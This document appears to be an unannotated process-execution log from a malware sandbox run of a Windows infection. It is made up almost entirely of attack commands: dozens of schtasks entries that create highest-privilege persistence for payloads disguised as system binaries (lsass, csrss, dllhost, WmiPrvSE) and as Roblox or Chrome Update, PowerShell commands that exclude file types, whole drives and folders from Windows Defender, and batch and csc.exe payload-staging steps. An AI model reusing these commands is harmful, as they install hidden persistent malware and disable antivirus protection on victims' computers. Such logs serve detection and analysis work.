schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\winNet\lsass.exe'" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 7 /tr "'C:\winNet\sddsfsdf.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 10 /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents\My Videos\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\eHome\wininit.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\fr-FR\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\dwm.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\sddsfsdf.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vMNJbUnSbM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9uqqWUlzO4.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4np3pl54\4np3pl54.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D5A.tmp" "c:\winNet\CSCA4C2121C24C74BF895E5B3D597394777.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mbi1aa25\mbi1aa25.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DE7.tmp" "c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcqkwtqq\lcqkwtqq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E54.tmp" "c:\Users\All Users\CSC95C42A624314BE78310BDEB9D835BA3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1ppnnp\mr1ppnnp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F1F.tmp" "c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfzenaag\cfzenaag.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F6D.tmp" "c:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\CSC67F9D5D440504062ACE553C19FFDE5E4.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsormrob\bsormrob.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8028.tmp" "c:\winNet\CSC49D7F72528124E81B41D936BF212C46B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gjjieqlg\gjjieqlg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8095.tmp" "c:\winNet\CSC97D079D2907144CEAE72F4F99686E3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ho3etse\3ho3etse.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8102.tmp" "c:\winNet\CSC3992B8FD69D44AFFAB9FE267318D8677.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iuv4z3u2\iuv4z3u2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES816F.tmp" "c:\Users\Admin\Documents\My Videos\CSC228DE5B123194A0D88E81292314E68A3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\isip5dhu\isip5dhu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81CD.tmp" "c:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\CSCDD2E6DCB555746B4A413D5CFB027D2AA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4bqf3ev\g4bqf3ev.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8259.tmp" "c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\24qxckip\24qxckip.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82D6.tmp" "c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tggocznb\tggocznb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8353.tmp" "c:\Users\All Users\Microsoft\eHome\CSC1ACF99C1ED05466F84E5BBE09011CE69.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nb1h5mye\nb1h5mye.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D0.tmp" "c:\MSOCache\All Users\CSC12ACF0B35F3F40B39BFE2C5B4089659.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dimtaqxu\dimtaqxu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES845C.tmp" "c:\DriversavessessionDlldhcp\CSCDB0D1EC529DA4CC8A5904E3928B049D7.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tec2jh3k\tec2jh3k.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D9.tmp" "c:\winNet\CSC50F968E876B4431CAAFB7131F4B618AD.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu1aq3rt\hu1aq3rt.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8527.tmp" "c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1451802786-450524094-15654959291856616033-8165324015582428211873060891409845559"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1240033177-1087581127-52718330253047587052423637-105435632017827248901758497198"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "434171039490841803-659286136170842003317782336711507689689-864061186-1185069012"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "210418219-5002661294701329731368471238-522211457-8196399031202507616-1462984557"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NNPPtxWawv.bat"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "897362320-41934790-91102571416317546481911294881-9260774479988698511668435757"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\winNet\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

